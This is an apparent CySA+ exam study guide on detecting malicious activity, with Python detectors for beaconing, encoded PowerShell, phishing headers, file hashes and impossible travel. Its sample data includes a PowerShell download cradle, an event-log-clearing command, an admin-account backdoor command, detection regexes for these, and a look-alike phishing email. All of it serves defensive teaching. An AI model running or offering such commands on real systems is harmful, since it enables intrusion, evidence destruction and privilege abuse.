1.3 Given a scenario, use appropriate tools or techniques to determine malicious activity.
📘CompTIA CySA+ (CS0-003)
When we talk about determining malicious activity, it means finding evidence of attacks, malware, or unauthorized access on your systems and network. Security analysts use different techniques to identify this activity quickly and accurately.
Let’s look at the common techniques:
1. Pattern Recognition
Pattern recognition is about identifying repeated signs or behaviors that are often linked to attacks.
Command and Control (C2)
- Attackers often use command and control servers to control infected devices (bots) remotely.
- Indicators to detect:
- Periodic or otherwise unusual outbound connections from internal hosts to external IPs, especially destinations the host has never contacted before.
- Repeated small requests sent at regular intervals (beaconing). Many implants add random jitter to the interval, so look for gaps that cluster around a value rather than repeat exactly.
- Tools used: network traffic analyzers, SIEM alerts, or IDS/IPS systems can spot these patterns, usually after baselining what normal traffic for that host looks like.
Example: A workstation that normally only accesses company servers suddenly sends data to a strange IP every hour. That’s a C2 pattern.
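The hourly C2 pattern above can be scored automatically. The following is an added example (not part of the CySA+ material) that reads a constructed connection log, groups records by source, destination and port, and flags flows whose inter-connection gaps and payload sizes are unusually regular. The log lines, hosts and thresholds are all assumptions chosen for illustration.

```python
# Beacon detection over a constructed connection log (added example, not from the CySA+ material).
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: "timestamp src_ip dst_ip dst_port bytes_out" (RFC 5737 test addresses, not real traffic).
SAMPLE_LOG = """\
2024-03-01T09:00:00 10.0.0.21 203.0.113.7 443 612
2024-03-01T09:00:58 10.0.0.21 203.0.113.7 443 598
2024-03-01T09:02:01 10.0.0.21 203.0.113.7 443 605
2024-03-01T09:03:00 10.0.0.21 203.0.113.7 443 611
2024-03-01T09:04:00 10.0.0.21 203.0.113.7 443 600
2024-03-01T09:00:10 10.0.0.21 10.0.0.5 445 18233
2024-03-01T09:00:12 10.0.0.21 10.0.0.5 445 44120
2024-03-01T09:01:45 10.0.0.21 10.0.0.5 445 90211
2024-03-01T09:03:59 10.0.0.21 10.0.0.5 445 1200
2024-03-01T09:04:01 10.0.0.21 10.0.0.5 445 77000
"""


def parse_flows(text):
    """Group connection records by (src, dst, port), keeping (timestamp, bytes) per record."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, size = line.split()
        flows[(src, dst, int(port))].append((datetime.fromisoformat(ts), int(size)))
    return flows


def beacon_score(events, min_events=4):
    """Return (interval_cv, size_cv, mean_interval_s) for a flow, or None if too few events.

    A coefficient of variation (stdev / mean) near 0 means the gaps (or sizes) are
    almost identical, which is what a timer-driven implant produces. Jittered beacons
    raise the CV, so the threshold is tunable rather than an exact-repetition test.
    """
    if len(events) < min_events:
        return None
    events = sorted(events)
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
    sizes = [size for _, size in events]
    mean_gap = mean(gaps)
    if mean_gap <= 0:
        return None
    return pstdev(gaps) / mean_gap, pstdev(sizes) / mean(sizes), mean_gap


def find_beacons(text, max_interval_cv=0.2, max_size_cv=0.2):
    """Return {flow: mean_interval_seconds} for flows whose timing and size are suspiciously regular."""
    hits = {}
    for flow, events in parse_flows(text).items():
        score = beacon_score(events)
        if score and score[0] <= max_interval_cv and score[1] <= max_size_cv:
            hits[flow] = round(score[2])
    return hits


if __name__ == "__main__":
    for flow, interval in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon {flow[0]} -> {flow[1]}:{flow[2]} every ~{interval}s")
```

The SMB traffic to the internal file server is bursty in both timing and size and is not flagged; the 443 connections to the external address are flagged as a beacon of roughly 60 seconds. In practice the CV thresholds are tuned per environment, because scheduled tasks, NTP and update checks are also regular.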
2. Interpreting Suspicious Commands
Sometimes attackers leave traces on systems themselves. Analysts can look at commands executed by users or scripts.
- Suspicious commands include:
- PowerShell download cradles such as Invoke-WebRequest or (New-Object Net.WebClient).DownloadString, and Base64 payloads passed with -EncodedCommand, which hide the script from a quick read of the command line.
- Clearing event logs (for example wevtutil cl Security or Clear-EventLog) or otherwise hiding system activity.
- Creating new user accounts and adding them to privileged groups (net user ... /add followed by net localgroup administrators ... /add).
- Tools used: host-based logging, SIEM, or endpoint detection and response (EDR) tools.
Analysts interpret these commands to see if they match malicious behavior.
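Interpreting a command means decoding it first and only then matching it against known-bad patterns. The following is an added example (not from the CySA+ material) that decodes a PowerShell -EncodedCommand payload (UTF-16LE text, Base64-encoded) and tags command lines with the indicator categories listed above. The process records, host names and the 198.51.100.22 address are constructed for illustration.

```python
# Interpreting suspicious command lines (added example, not from the CySA+ material).
import base64
import re

# Constructed process-creation command lines (hypothetical host, TEST-NET-2 address, not real telemetry).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.22/a')"


def encode_ps(script):
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_COMMANDS = [
    "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(CRADLE),
    "wevtutil.exe cl Security",
    "net user backup_svc P@ss! /add && net localgroup administrators backup_svc /add",
    "powershell.exe Get-ChildItem C:\\Users",  # benign admin activity, should produce no tags
]

# -e, -ec, -enc and -EncodedCommand are all accepted abbreviations of the same switch.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b"
        r"|Net\.WebClient|certutil.*urlcache|bitsadmin.*transfer", re.I),
    "log_tampering": re.compile(r"wevtutil(?:\.exe)?\s+cl\b|Clear-EventLog|auditpol\s+/clear", re.I),
    "privileged_account": re.compile(
        r"net\s+user\s+\S+\s+\S+\s+/add|net\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    "hidden_or_encoded": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand payload, or None if absent or not valid Base64/UTF-16LE."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the sorted indicator names matching the command line, including its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(text))


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify(cmd) or ["no indicator"], "<-", cmd[:70])
```

Without the decoding step the first command line would only be tagged for the hidden window and the encoded switch; the download cradle is visible only in the decoded text. The same approach extends to other layers of obfuscation (compressed or string-concatenated scripts), each of which needs its own decoder before pattern matching is meaningful.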
3. Email Analysis
Email is one of the most common attack vectors. Analysts need to analyze suspicious emails carefully.
a. Header Analysis
- Every email has a header with technical details:
- Sending server (IP address): recorded in the Received lines added by each server that handled the message. Read them bottom-up to trace the path; only the line added by your own mail server can be fully trusted, because earlier hops can be forged.
- Sender information: the visible From address, but also Return-Path (the envelope sender used for SPF) and Reply-To, which attackers often point at a domain they control.
- Email routing path and the Authentication-Results line, where the receiving server records its SPF, DKIM and DMARC verdicts.
- Analysts check whether the email came from a legitimate source by comparing these fields with each other rather than trusting the From address alone.
b. Impersonation
- Attackers often pretend to be someone trusted (like a boss or IT team).
- Look for:
- Slightly altered sender email addresses: look-alike domains (a digit in place of a letter, an extra word such as "mail-"), or a trusted display name placed in front of an unrelated address.
- Requests that don't match normal behavior (urgency, secrecy, a change of payment details, a request to bypass a process).
c. DKIM, DMARC, SPF
These are email authentication protocols:
- DKIM (DomainKeys Identified Mail)
- The sending domain signs selected headers and the body with a private key; the receiver fetches the matching public key from DNS and verifies that the message was authorized by that domain and not altered in transit.
- DMARC (Domain-based Message Authentication, Reporting, and Conformance)
- A policy the From domain publishes in DNS that tells receivers what to do (none, quarantine, or reject) when a message fails both SPF and DKIM alignment with the visible From domain, and asks them to send aggregate and failure reports back to the domain owner.
- SPF (Sender Policy Framework)
- Checks whether the sending server's IP is listed in the DNS TXT record of the envelope sender (Return-Path) domain. Because SPF checks the envelope sender rather than the visible From address, a passing SPF result by itself does not prove the From header is genuine; DMARC is what ties the two together.
d. Embedded Links
- Attackers include links to phishing sites or malware downloads.
- Analysts inspect URLs without clicking using tools that check domain reputation or sandbox execution.
In short: headers tell you which servers handled the email and which addresses it claims, SPF/DKIM/DMARC tell you whether the sending domain actually authorized it, and links tell you where it wants to send the user.
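The checks from the header, impersonation, authentication and link sections can be run together over a raw message. The following is an added example (not from the CySA+ material) that parses a constructed phishing email, compares the From domain with Return-Path and Reply-To, reads the Authentication-Results verdicts, identifies the first external hop, and extracts links without visiting them, flagging look-alike domains by edit distance. The message, domains and addresses are constructed from reserved example names; the "last two labels" shortcut for the registrable domain is a simplification of what a Public Suffix List lookup would do.

```python
# Email header and link analysis (added example, not from the CySA+ material).
import email
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed phishing sample using reserved example domains and TEST-NET addresses; not a real message.
RAW_MESSAGE = """\
Return-Path: <bounce@examp1e.com>
Received: from mx.corp.example (mx.corp.example [192.0.2.10]) by inbox.corp.example; Mon, 4 Mar 2024 08:01:02 +0000
Received: from relay.examp1e.com (relay.examp1e.com [198.51.100.9]) by mx.corp.example; Mon, 4 Mar 2024 08:01:01 +0000
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=examp1e.com; dkim=none; dmarc=fail header.from=example.com
From: "CEO Jane Doe" <jane.doe@example.com>
Reply-To: jane.doe@examp1e.com
To: finance@corp.example
Subject: Urgent wire transfer
Content-Type: text/plain

Please review the invoice at http://login.example.com.examp1e.com/invoice and wire today.
"""
TRUSTED_DOMAINS = ["example.com", "corp.example"]  # assumed list of the organisation's own domains

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
URL_RE = re.compile(r"""https?://[^\s<>"']+""")
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)


def domain_of(header_value):
    """Lowercase domain of the address in a header, or None if the header is missing."""
    if not header_value:
        return None
    addr = parseaddr(header_value)[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None


def registered_domain(hostname):
    """Last two labels as a stand-in for the registrable domain (real code should use the Public Suffix List)."""
    return ".".join(hostname.lower().split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot look-alike domains such as examp1e.com vs example.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze(raw, trusted_domains):
    """Return header facts plus a list of human-readable findings for one raw message."""
    msg = email.message_from_string(raw)
    from_domain = domain_of(msg["From"])
    findings = []

    # 1. Alignment: the envelope sender and Reply-To should normally share the From domain.
    for header in ("Return-Path", "Reply-To"):
        other = domain_of(msg[header])
        if other and other != from_domain:
            findings.append(f"{header} domain {other} does not match From domain {from_domain}")

    # 2. Authentication verdicts recorded by our own mail server.
    auth = {k.lower(): v.lower() for k, v in AUTH_RE.findall(msg.get("Authentication-Results", ""))}
    if auth.get("dmarc") == "fail":
        findings.append(f"DMARC failed for {from_domain}; an SPF pass only covers the envelope domain")

    # 3. Routing: the bottom-most Received line is the earliest hop we can see.
    received = msg.get_all("Received") or []
    hop = IP_RE.search(received[-1]) if received else None
    first_hop = hop.group(1) if hop else None

    # 4. Links: extract without visiting, then compare registrable domains with trusted ones.
    urls = URL_RE.findall(msg.get_payload())
    candidates = {domain_of(msg["Return-Path"]), domain_of(msg["Reply-To"])}
    candidates |= {registered_domain(urlparse(u).hostname) for u in urls}
    for candidate in sorted(c for c in candidates if c):
        for trusted in trusted_domains:
            if candidate != trusted and edit_distance(candidate, trusted) <= 2:
                findings.append(f"look-alike domain {candidate} resembles {trusted}")

    return {"from_domain": from_domain, "auth": auth, "first_hop_ip": first_hop, "urls": urls, "findings": findings}


def analyze_sample():
    return analyze(RAW_MESSAGE, TRUSTED_DOMAINS)


if __name__ == "__main__":
    for finding in analyze_sample()["findings"]:
        print("-", finding)
```

Note what the authentication results alone would have told you: SPF passed, because the attacker controls examp1e.com and published a valid SPF record for it. Only the DMARC failure (the From domain example.com is not aligned with the domain that passed SPF) and the header comparison expose the impersonation.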
4. File Analysis
File analysis helps determine if a file is malicious before it is opened.
Hashing
- Hashing a file produces a fixed-length fingerprint (MD5, SHA-1, SHA-256). Identical files always produce the same hash, and changing even a single byte produces a different one. MD5 and SHA-1 are collision-prone, so use SHA-256 for your own baselines, but still record the MD5 because many threat-intelligence sources are indexed by it.
- Analysts:
- Compare the file hash against known malware databases or threat-intelligence feeds.
- Verify whether a file was altered or tampered with by comparing its hash to a trusted baseline or a vendor-published value.
- Caveat: a hash matches only an exact copy. Repacked or slightly modified malware produces a new hash, so a miss is not proof that a file is clean.
Example: If a new executable appears on a server, hashing it can tell you if it matches known malware.
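Both uses of hashing, matching against known-bad hashes and detecting tampering against a baseline, can be shown together. The following is an added example (not from the CySA+ material) that builds a SHA-256 manifest of a directory, simulates a compromise in a temporary folder, and reports what was added, modified or removed, plus any file whose hash appears in an IOC set. The files, their contents and the "known bad" hash are constructed for the example.

```python
# File hashing for IOC matching and tamper detection (added example, not from the CySA+ material).
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk_size=65536):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in root.rglob("*") if p.is_file()}


def diff_manifest(baseline, current):
    """Report files added, removed, or whose hash changed since the trusted baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
    }


def match_iocs(manifest, known_bad_hashes):
    """Files whose hash appears in a threat-intel set. A miss means 'not an exact copy', not 'clean'."""
    return {path: h for path, h in manifest.items() if h in known_bad_hashes}


DROPPER = b"MZ...constructed dropper bytes"  # stand-in for a malicious executable
KNOWN_BAD = {hashlib.sha256(DROPPER).hexdigest()}  # constructed IOC set, not a real feed


def demo():
    """Build a baseline, simulate a compromise, and re-check. Returns (diff, ioc_matches)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "svc.exe").write_bytes(b"legitimate service binary v1")
        (root / "config.ini").write_bytes(b"mode=prod\n")
        baseline = build_manifest(root)

        # Simulated intrusion: the service binary is patched by one byte and a dropper appears.
        (root / "bin" / "svc.exe").write_bytes(b"legitimate service binary v2")
        (root / "bin" / "update.exe").write_bytes(DROPPER)
        current = build_manifest(root)

        return diff_manifest(baseline, current), match_iocs(current, KNOWN_BAD)


if __name__ == "__main__":
    changes, iocs = demo()
    print("changes:", changes)
    print("IOC matches:", iocs)
```

The one-byte change to svc.exe is enough to show it as modified, which is exactly why hashes work for integrity checking and, conversely, why a trivially repacked sample evades a hash-only IOC match.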
5. User Behavior Analysis
Analyzing how users normally behave helps spot abnormal activity.
a. Abnormal Account Activity
- Unusual logins, access to files that are normally not accessed, or large data downloads.
- Tools: SIEM, UEBA (User and Entity Behavior Analytics).
b. Impossible Travel
- If a user logs in from two locations that are too far apart for the time between the logins (for example two countries within 30 minutes), it's a red flag. Corporate VPN exits, cloud-hosted browsers and mobile carrier gateways can produce the same pattern, so confirm the source of each login before treating it as a compromise.
- Tools: SIEM or identity analytics tools can detect impossible travel events automatically.
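The impossible-travel rule is a distance-versus-time calculation over consecutive sign-ins per user. The following is an added example (not from the CySA+ material) that applies the haversine great-circle formula to constructed sign-in records and flags any pair that implies a speed above roughly airliner speed. The users, timestamps and coordinates are constructed; in production the coordinates would come from an IP geolocation database.

```python
# Impossible-travel detection over constructed sign-in records (added example, not from the CySA+ material).
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sign-ins: (user, UTC timestamp, city, latitude, longitude).
SIGN_INS = [
    ("alice", "2024-03-04T09:00:00", "New York", 40.71, -74.01),
    ("alice", "2024-03-04T09:30:00", "Frankfurt", 50.11, 8.68),
    ("bob", "2024-03-04T08:00:00", "London", 51.51, -0.13),
    ("bob", "2024-03-04T10:00:00", "Paris", 48.86, 2.35),
    ("carol", "2024-03-04T07:00:00", "Sydney", -33.87, 151.21),
    ("carol", "2024-03-04T07:00:00", "Sydney", -33.87, 151.21),  # duplicate event, zero distance
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two latitude/longitude points (Earth radius 6371 km)."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(sign_ins, max_kmh=900.0):
    """Flag consecutive sign-ins per user whose implied speed exceeds max_kmh (roughly airliner speed).

    The test is written as 'distance > speed * time' rather than a division, so two
    sign-ins at the same instant from different places are flagged instead of
    raising a division-by-zero error.
    """
    by_user = defaultdict(list)
    for user, ts, city, lat, lon in sign_ins:
        by_user[user].append((datetime.fromisoformat(ts), city, lat, lon))

    alerts = []
    for user, events in by_user.items():
        events.sort()
        for (t1, c1, la1, lo1), (t2, c2, la2, lo2) in zip(events, events[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            hours = (t2 - t1).total_seconds() / 3600
            if km > max_kmh * hours:
                alerts.append({"user": user, "from": c1, "to": c2, "km": round(km), "hours": round(hours, 2)})
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(SIGN_INS):
        print(f"{alert['user']}: {alert['from']} -> {alert['to']}, {alert['km']} km in {alert['hours']} h")
```

alice's New York to Frankfurt pair (about 6,200 km in 30 minutes) is flagged; bob's London to Paris pair in two hours is not, and carol's identical repeated sign-in has zero distance and is ignored. Lowering max_kmh to model ground travel only would also flag bob, which is the knob an analyst tunes to the organisation's actual travel patterns.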
Key Takeaways for the Exam
- Pattern Recognition → look for repeated behaviors like C2 communications.
- Suspicious Commands → examine system commands for malicious intent.
- Email Analysis → check headers, verify DKIM/DMARC/SPF, watch for impersonation and malicious links.
- File Analysis → use hashing to identify and verify files.
- User Behavior Analysis → detect unusual activities like abnormal access or impossible travel.
✅ Exam Tip:
Many CySA+ questions are scenario-based. If you see a question like:
“A user account logs in from two different countries within 30 minutes. What technique would detect this?”
The correct answer is User Behavior Analysis – Impossible Travel.
